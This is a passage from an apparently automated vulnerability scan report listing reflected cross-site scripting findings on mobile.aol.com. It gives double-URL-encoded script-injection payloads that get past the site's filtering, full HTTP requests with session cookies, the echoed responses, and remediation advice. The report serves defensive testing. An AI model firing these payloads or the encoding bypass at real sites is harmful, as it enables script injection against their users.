Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:55 GMT; path=/
Content-Type: text/html
Content-Length: 23656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="aol-radio76830</script><script>alert(1)</script>a9a6362a6e9";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.118. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/daily-finance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7de3f%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06bfb8595ba was submitted in the REST URL parameter 2. This input was echoed as 7de3f</script><script>alert(1)</script>06bfb8595ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone7de3f%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06bfb8595ba/daily-finance/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617149869-Repeat%7C1367689149869%3B%20s_nrgvo%3DRepeat%7C1367689149870%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:17 GMT; path=/
Content-Type: text/html
Content-Length: 23719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone7de3f</script><script>alert(1)</script>06bfb8595ba";
   s_265.prop2="daily-finance";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('sc
...[SNIP]...

5.119. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/daily-finance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50ba1%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d0ecf0a2c was submitted in the REST URL parameter 2. This input was echoed as 50ba1</script><script>alert(1)</script>35d0ecf0a2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone50ba1%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d0ecf0a2c/daily-finance/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617149869-Repeat%7C1367689149869%3B%20s_nrgvo%3DRepeat%7C1367689149870%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:33 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:33 GMT; path=/
Content-Type: text/html
Content-Length: 23720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhone50ba1</script><script>alert(1)</script>35d0ecf0a2c';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.120. http://mobile.aol.com/product/iPhone/daily-finance/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/daily-finance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 149c0%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdad91adfaf was submitted in the REST URL parameter 3. This input was echoed as 149c0</script><script>alert(1)</script>cdad91adfaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/daily-finance149c0%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdad91adfaf/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617149869-Repeat%7C1367689149869%3B%20s_nrgvo%3DRepeat%7C1367689149870%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:58 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:58 GMT; path=/
Content-Type: text/html
Content-Length: 23666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
d : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="daily-finance149c0</script><script>alert(1)</script>cdad91adfaf";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.121. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/engadget/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fd41%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdd21a05859 was submitted in the REST URL parameter 2. This input was echoed as 8fd41</script><script>alert(1)</script>cdd21a05859 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone8fd41%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdd21a05859/engadget/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617157683-Repeat%7C1367689157683%3B%20s_nrgvo%3DRepeat%7C1367689157684%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:26 GMT; path=/
Content-Type: text/html
Content-Length: 23704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone8fd41</script><script>alert(1)</script>cdd21a05859";
   s_265.prop2="engadget";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script'
...[SNIP]...

5.122. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/engadget/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 847e2%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04b562a1c3d was submitted in the REST URL parameter 2. This input was echoed as 847e2</script><script>alert(1)</script>04b562a1c3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone847e2%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04b562a1c3d/engadget/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617157683-Repeat%7C1367689157683%3B%20s_nrgvo%3DRepeat%7C1367689157684%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:42 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:42 GMT; path=/
Content-Type: text/html
Content-Length: 23704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhone847e2</script><script>alert(1)</script>04b562a1c3d';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.123. http://mobile.aol.com/product/iPhone/engadget/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/engadget/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0a91%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee988df3f567 was submitted in the REST URL parameter 3. This input was echoed as b0a91</script><script>alert(1)</script>e988df3f567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/engadgetb0a91%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee988df3f567/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617157683-Repeat%7C1367689157683%3B%20s_nrgvo%3DRepeat%7C1367689157684%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:42:06 GMT; path=/
Content-Type: text/html
Content-Length: 23654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
e="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="engadgetb0a91</script><script>alert(1)</script>e988df3f567";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

5.124. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/iPad/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b9fd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f9cd963758 was submitted in the REST URL parameter 2. This input was echoed as 8b9fd</script><script>alert(1)</script>5f9cd963758 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone8b9fd%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5f9cd963758/iPad/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:13 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:13 GMT; path=/
Content-Type: text/html
Content-Length: 23692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
xID="mbd";
   s_265.pageName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone8b9fd</script><script>alert(1)</script>5f9cd963758";
   s_265.prop2="iPad";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');

...[SNIP]...

5.125. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/iPad/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab98b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ffb41f2480 was submitted in the REST URL parameter 2. This input was echoed as ab98b</script><script>alert(1)</script>0ffb41f2480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhoneab98b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ffb41f2480/iPad/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:28 GMT; path=/
Content-Type: text/html
Content-Length: 23692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
<!--
adSetAdURL('http://mobile.aol.com/_uac/adpage.html');

/* Array declared for highlighting the gh_Navigation */
var _selected_prod_cat = 'iPhoneab98b</script><script>alert(1)</script>0ffb41f2480';
if(_selected_prod_cat!=""){ _selected_prod_cat = _selected_prod_cat.toLowerCase(); }
var navArray = new Array();
navArray['iphone'] = 1;
navArray['android'] = 2;
navArray['blackberry']= 3
...[SNIP]...

5.126. http://mobile.aol.com/product/iPhone/iPad/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/product/iPhone/iPad/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce3c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cded6ec663 was submitted in the REST URL parameter 3. This input was echoed as fce3c</script><script>alert(1)</script>5cded6ec663 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/iPhone/iPadfce3c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cded6ec663/ HTTP/1.1
Host: mobile.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304617147041-Repeat%7C1367689147041%3B%20s_nrgvo%3DRepeat%7C1367689147043%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:41:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 13:41:53 GMT; path=/
Content-Type: text/html
Content-Length: 23643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head> <!-- 1 to 100
...[SNIP]...
eName="mbd : "+document.title;
   s_265.server="";
   s_265.channel="us.mbdash";
   s_265.pageType="";
   s_265.linkInternalFilters="javascript:,mobile.aol.com";
   s_265.prop1="iPhone";
   s_265.prop2="iPadfce3c</script><script>alert(1)</script>5cded6ec663";
   s_265.mmxgo = true;
   s_265.prop12=document.location;
   s_265.t();
}
var s_account = "aolmobdash,aolsvc";
(function(){
   var d = document, s = d.createElement('script');
   s.type = 'text/javasc
...[SNIP]...

